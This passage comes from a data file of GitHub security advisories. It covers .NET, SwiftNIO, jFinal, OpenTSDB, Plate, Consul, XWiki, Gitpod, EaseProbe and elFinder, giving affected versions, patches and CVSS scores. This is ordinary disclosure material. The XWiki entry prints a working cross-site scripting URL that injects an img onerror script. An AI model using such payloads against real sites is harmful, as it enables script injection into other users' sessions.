[Microsoft.NetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm) | >= 6.0.1, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-x64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-x64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-arm64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-x64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 6.0.0, < 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 6.0.0, < 6.0.16 | 6.0.18 ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.7 or SDK 7.0.106 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.18 or SDK 6.0.312 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-29331]( https://www.cve.org/CVERecord?id=2023-29331) ### Revisions V1.0 (June 13, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-06-13_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.Windows.Compatibility'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.1'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.Windows.Compatibility'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.4'}}, {'package': {'ecosystem': 'NuGet', 'name': 'System.Security.Cryptography.Pkcs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.1'}}, {'package': {'ecosystem': 'NuGet', 'name': 'System.Security.Cryptography.Pkcs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.2'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.osx-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.osx-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.osx-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.osx-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-555c-2p6r-68mm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29331'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/257'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29331'}, {'type': 'WEB', 'url': 'https://support.microsoft.com/kb/5025823'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T17:08:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-773g-x274-8qmf,2023-06-07T16:05:48Z,2023-06-07T16:05:48Z,,['CVE-2022-3252'],SwiftNIO Extras vulnerable to improper detection of complete HTTP body decompression,"SwiftNIO Extras provides a pair of helpers for transparently decompressing received HTTP request or response bodies. These two objects (`HTTPRequestDecompressor` and `HTTPResponseDecompressor`) both failed to detect when the decompressed body was considered complete. If trailing junk data was appended to the HTTP message body, the code would repeatedly attempt to decompress this data and fail. This would lead to an infinite loop making no forward progress, leading to livelock of the system and denial-of-service. This issue can be triggered by any attacker capable of sending a compressed HTTP message. Most commonly this is HTTP servers, as compressed HTTP messages cannot be negotiated for HTTP requests, but it is possible that users have configured decompression for HTTP requests as well. The attack is low effort, and likely to be reached without requiring any privilege or system access. The impact on availability is high: the process immediately becomes unavailable but does not immediately crash, meaning that it is possible for the process to remain in this state until an administrator intervenes or an automated circuit breaker fires. If left unchecked this issue will very slowly exhaust memory resources due to repeated buffer allocation, but the buffers are not written to and so it is possible that the processes will not terminate for quite some time. This risk can be mitigated by removing transparent HTTP message decompression. The issue is fixed by correctly detecting the termination of the compressed body as reported by zlib and refusing to decompress further data.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-nio-extras'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.14.0'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-nio-extras'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.10.3'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-nio-extras'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-extras/security/advisories/GHSA-773g-x274-8qmf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-3252'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-extras/pull/177'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-extras/pull/177/commits/359015de2c49e426c27b1d25dbf599b08a9d3ee6'}, {'type': 'PACKAGE', 'url': 'https://github.com/apple/swift-nio-extras'}]","{'cwe_ids': ['CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-07T16:05:48Z', 'nvd_published_at': '2022-09-21T19:15:00Z'}" 1.4.0,GHSA-cgmm-c2m9-ff7r,2023-07-05T17:16:48Z,2023-06-26T21:30:59Z,,['CVE-2021-31635'],jFinal Server-Side Template Injection vulnerability,Server-Side Template Injection (SSTI) vulnerability in jFinal v.4.9.08 allows a remote attacker to execute arbitrary code via the template function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.jfinal:jfinal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.9.08'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31635'}, {'type': 'WEB', 'url': 'https://github.com/jfinal/jfinal/issues/187'}, {'type': 'WEB', 'url': 'https://gitee.com/jfinal/jfinal/issues/I3IXLE'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-29T15:02:49Z', 'nvd_published_at': None}" 1.4.0,GHSA-76f7-9v52-v2fw,2023-06-30T22:58:41Z,2023-06-30T22:58:41Z,,['CVE-2023-36812'],Remote Code Execution for 2.4.1 and earlier,"### Impact OpenTSDB is vulnerable to Remote Code Execution vulnerability by writing user-controlled input to Gnuplot configuration file and running Gnuplot with the generated configuration. ### Patches Patched in [07c4641471c6f5c2ab5aab615969e97211eb50d9](https://github.com/OpenTSDB/opentsdb/commit/07c4641471c6f5c2ab5aab615969e97211eb50d9) and further refined in https://github.com/OpenTSDB/opentsdb/commit/fa88d3e4b5369f9fb73da384fab0b23e246309ba ### Workarounds Disable Gunuplot via `tsd.core.enable_ui = true` and remove the shell files https://github.com/OpenTSDB/opentsdb/blob/master/src/mygnuplot.bat and https://github.com/OpenTSDB/opentsdb/blob/master/src/mygnuplot.sh.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.opentsdb:opentsdb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.4.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/OpenTSDB/opentsdb/security/advisories/GHSA-76f7-9v52-v2fw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36812'}, {'type': 'WEB', 'url': 'https://github.com/OpenTSDB/opentsdb/commit/07c4641471c6f5c2ab5aab615969e97211eb50d9'}, {'type': 'WEB', 'url': 'https://github.com/OpenTSDB/opentsdb/commit/fa88d3e4b5369f9fb73da384fab0b23e246309ba'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenTSDB/opentsdb'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/174570/OpenTSDB-2.4.1-Unauthenticated-Command-Injection.html'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T22:58:41Z', 'nvd_published_at': None}" 1.4.0,GHSA-4882-hxpr-hrvm,2023-06-09T22:41:56Z,2023-06-09T22:41:56Z,,['CVE-2023-34245'],@udecode/plate-link does not sanitize URLs to prevent use of the `javascript:` scheme,"### Impact Affected versions of the link plugin and link UI component do not sanitize URLs to prevent use of the `javascript:` scheme. As a result, links with JavaScript URLs can be inserted into the Plate editor through various means, including opening or pasting malicious content. ### Patches `@udecode/plate-link` 20.0.0 resolves this issue by introducing an `allowedSchemes` option to the link plugin, defaulting to `['http', 'https', 'mailto', 'tel']`. URLs using a scheme that isn't in this list will not be rendered to the DOM. ### Workarounds If you are unable to update `@udecode/plate-link` to version 20.0.0, we recommend overriding the `LinkElement` and `PlateFloatingLink` components with implementations that explicitly check the URL scheme before rendering any anchor elements. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@udecode/plate-link'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/udecode/plate/security/advisories/GHSA-4882-hxpr-hrvm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34245'}, {'type': 'WEB', 'url': 'https://github.com/udecode/plate/pull/2240'}, {'type': 'WEB', 'url': 'https://github.com/udecode/plate/commit/93dd5712854660874900ae12e4d8e6ff28089eb7'}, {'type': 'PACKAGE', 'url': 'https://github.com/udecode/plate'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:41:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-c57c-7hrj-6q6v,2023-06-06T02:05:01Z,2023-06-03T00:30:16Z,,['CVE-2023-1297'],Hashicorp Consul vulnerable to denial of service,"Consul and Consul Enterprise's cluster peering implementation contained a flaw whereby a peer cluster with service of the same name as a local service could corrupt Consul state, resulting in denial of service. This vulnerability was resolved in Consul 1.14.5, and 1.15.3","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.14.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.15.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1297'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-15-consul-cluster-peering-can-result-in-denial-of-service/54515'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/consul'}]","{'cwe_ids': ['CWE-826'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:05:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-fwwj-wg89-7h4c,2023-06-26T16:37:59Z,2023-06-20T16:48:36Z,,['CVE-2023-35155'],XWiki Platform vulnerable to cross-site scripting in target parameter via share page by email,"### Impact Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). For instance, the following URL execute an `alter` on the browser: `/xwiki/bin/view/Main/?viewer=share&send=1&target=&target=%3Cimg+src+onerror%3Dalert%28document.domain%29%3E+%3Cimg+src+onerror%3Dalert%28document.domain%29%3E+%3Crenniepak%40intigriti.me%3E&includeDocument=inline&message=I+wanted+to+share+this+page+with+you.`, where `` is the URL of your XWiki installation. See https://jira.xwiki.org/browse/XWIKI-20370 for me details. ### Patches The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.4, and 14.4.8. ### Workarounds The fix is only impacting Velocity templates and page contents, so applying this [patch](https://github.com/xwiki/xwiki-platform/commit/ca88ebdefb2c9fa41490959cce9f9e62404799e7) is enough to fix the issue. ### References https://jira.xwiki.org/browse/XWIKI-20370 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ### Attribution This vulnerability has been reported on Intigriti by René de Sain @renniepak.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-sharepage-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6-rc-2'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-sharepage-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-fwwj-wg89-7h4c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35155'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/ca88ebdefb2c9fa41490959cce9f9e62404799e7'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20370'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:48:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-gqx9-h3w2-fprg,2023-06-12T16:44:45Z,2023-06-05T15:33:28Z,,['CVE-2023-32766'],Gitpod vulnerable to Cross-site Scripting,Gitpod before 2022.11.3 allows XSS because redirection can occur for some protocols outside of the trusted set of three (vscode: vscode-insiders: jetbrains-gateway:).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/gitpod-io/gitpod'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2022.11.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32766'}, {'type': 'WEB', 'url': 'https://github.com/gitpod-io/gitpod/pull/17559'}, {'type': 'WEB', 'url': 'https://github.com/gitpod-io/gitpod/commit/6771283c3406586e352337675b79ff2ca50f191b'}, {'type': 'WEB', 'url': 'https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=default&tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d'}, {'type': 'PACKAGE', 'url': 'https://github.com/gitpod-io/gitpod'}, {'type': 'WEB', 'url': 'https://github.com/gitpod-io/gitpod/compare/release-2022.11.2...2022.11.3'}, {'type': 'WEB', 'url': 'https://github.com/gitpod-io/gitpod/releases/tag/2022.11.3'}, {'type': 'WEB', 'url': 'https://www.gitpod.io'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:07:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-4c32-w6c7-77x4,2023-06-06T01:38:49Z,2023-06-06T01:38:49Z,,['CVE-2023-33967'],SQL injection when using MySQL/PostgreSQL data checking,"An SQL injection issue was discovered in EaseProbe before 2.1.0 when using MySQL/PostgreSQL data checking. This problem has been fixed in v2.1.0; users should upgrade to this version. The vulnerability was discovered by the [Oxeye research](https://www.oxeye.io/) team. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/megaease/easeprobe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/megaease/easeprobe/security/advisories/GHSA-4c32-w6c7-77x4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33967'}, {'type': 'WEB', 'url': 'https://github.com/megaease/easeprobe/pull/330'}, {'type': 'WEB', 'url': 'https://github.com/megaease/easeprobe/commit/caaf5860df2aaa76acd29bc40ec9a578d0b1d6e1'}, {'type': 'PACKAGE', 'url': 'https://github.com/megaease/easeprobe'}, {'type': 'WEB', 'url': 'https://github.com/megaease/easeprobe/releases/tag/v2.1.0'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:38:49Z', 'nvd_published_at': None}" 1.4.0,GHSA-wm5g-p99q-66g4,2023-06-19T20:17:51Z,2023-06-14T16:37:01Z,,['CVE-2023-35840'],elFinder vulnerable to path traversal in LocalVolumeDriver connector,"### Impact Path Traversal vulnerability in PHP LocalVolumeDriver connector. This vulnerability can be exploited by allowing untrusted users to write to the local file system. This issue was caused by incomplete validity checking of the supplied request parameters. That problem has been fixed in elFinder Version 2.1.62. ### Patches This vulnerability has been fixed in elFinder 2.1.62. Installation managers should update to the latest version as soon as possible. ### Workarounds If you cannot update for some reason, you must stop using it or prohibit writing to untrusted users.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'studio-42/elfinder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.62'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Studio-42/elFinder/security/advisories/GHSA-wm5g-p99q-66g4'}, {'type': 'WEB', 'url': 'https://github.com/Studio-42/elFinder/commit/bb9aaa7b096a1b83f2f85657c43f12131ece2891'}, {'type': 'PACKAGE', 'url': 